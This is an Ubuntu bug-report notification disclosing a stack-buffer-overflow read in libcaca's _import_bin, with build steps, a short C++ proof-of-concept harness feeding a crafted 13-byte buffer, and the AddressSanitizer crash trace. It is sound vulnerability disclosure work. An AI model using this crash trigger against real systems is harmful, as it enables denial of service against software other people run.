[Bug 1925468] [NEW] stack-buffer-overflow of import.c in function _import_bin

Thu, 22 Apr 2021 03:41:06 -0700 

*** This bug is a security vulnerability ***

Public security bug reported:

Hello ubuntu security team
System info:
Ubuntu 20.04 : clang 10.0.0 , gcc 9.3.0
Fedora 33: clang 11.0.0 , gcc 10.2.1

libcaca version e4968ba

Verification steps:
1.Get the source code of libcaca
2.Compile the libcaca.so library

$ cd libcaca
$ ./bootstrap
$ ./configure
$ make
or

$ cd libcaca
$ ./bootstrap
$ ../configure CC="clang -O2 -fno-omit-frame-pointer -g 
-fsanitize=address,fuzzer-no-link  -fsanitize-coverage=bb" CXX="clang++ -O2 
-fno-omit-frame-pointer -g -fsanitize=address,fuzzer-no-link  
-fsanitize-coverage=bb"
$ make
3.Create the poc_bin.cc && build

#include "config.h"
#include "caca.h"
//#include "common-image.h"
#include <assert.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <fstream>
#include <iostream>

using namespace std;

void crash(const uint8_t *Data, size_t Size) {

  if(Size<8) return ;
  size_t len=0;
  caca_canvas_t *cv;
  cv = caca_create_canvas(0,0);
  caca_create_frame(cv,0);
  caca_set_frame(cv,0);
  caca_import_canvas_from_memory(cv,Data,Size,"bin");
  caca_free_canvas(cv);
  cv=NULL;

}

int main(int args,char* argv[]){
        size_t  len = 0;
        unsigned char buffer[] = 
{0x0a,0x20,0x0a,0x0a,0x20,0x20,0x20,0x20,0x20,0x20,0x47,0x47,0x47};
        len = sizeof(buffer)/sizeof(unsigned char);
        printf("%d\n",sizeof(buffer)/sizeof(unsigned char));
        crash((const uint8_t*)buffer,len);
        return 0;

}
4.compile poc_bin.cc

clang++ -g poc_bin.cc -O2 -fno-omit-frame-pointer -fsanitize=address  -I./caca/ 
-lcaca -L./caca/.libs/ -Wl,-rpath,./caca/.libs/  -o poc_bin
5.Run poc_bin
asan info:

=================================================================
==3817476==ERROR: AddressSanitizer: stack-buffer-overflow on address 
0x7ffe7cd3774d at pc 0x7f8c6314acfd bp 0x7ffe7cd376c0 sp 0x7ffe7cd376b8
READ of size 1 at 0x7ffe7cd3774d thread T0
    #0 0x7f8c6314acfc in _import_bin 
/home/hh/Downloads/libcaca/caca/codec/import.c:425:33
    #1 0x4c6c72 in crash(unsigned char const*, unsigned long) 
/home/hh/Downloads/libcaca/poc_bin.cc:21:3
    #2 0x4c6c72 in main /home/hh/Downloads/libcaca/poc_bin.cc:34:9
    #3 0x7f8c62ba00b2 in __libc_start_main 
/build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16
    #4 0x41c38d in _start (/home/hh/Downloads/libcaca/poc_bin+0x41c38d)

Address 0x7ffe7cd3774d is located in stack of thread T0 at offset 45 in frame
    #0 0x4c6b9f in main /home/hh/Downloads/libcaca/poc_bin.cc:28

  This frame has 1 object(s):
    [32, 45) 'buffer' (line 31) <== Memory access at offset 45 overflows this 
variable
HINT: this may be a false positive if your program uses some custom stack 
unwind mechanism, swapcontext or vfork
      (longjmp and C++ exceptions *are* supported)
SUMMARY: AddressSanitizer: stack-buffer-overflow 
/home/hh/Downloads/libcaca/caca/codec/import.c:425:33 in _import_bin
Shadow bytes around the buggy address:
  0x10004f99ee90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x10004f99eea0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x10004f99eeb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x10004f99eec0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x10004f99eed0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x10004f99eee0: 00 00 00 00 f1 f1 f1 f1 00[05]f3 f3 00 00 00 00
  0x10004f99eef0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x10004f99ef00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x10004f99ef10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x10004f99ef20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x10004f99ef30: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
  Shadow gap:              cc
==3817476==ABORTING

Thanks

** Affects: libcaca (Ubuntu)
     Importance: Undecided
         Status: New

** Information type changed from Public to Public Security

-- 
You received this bug notification because you are a member of Ubuntu
Bugs, which is subscribed to Ubuntu.
https://bugs.launchpad.net/bugs/1925468

Title:
  stack-buffer-overflow of import.c in function _import_bin

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/libcaca/+bug/1925468/+subscriptions

-- 
ubuntu-bugs mailing list
[email protected]
https://lists.ubuntu.com/mailman/listinfo/ubuntu-bugs

Reply via email to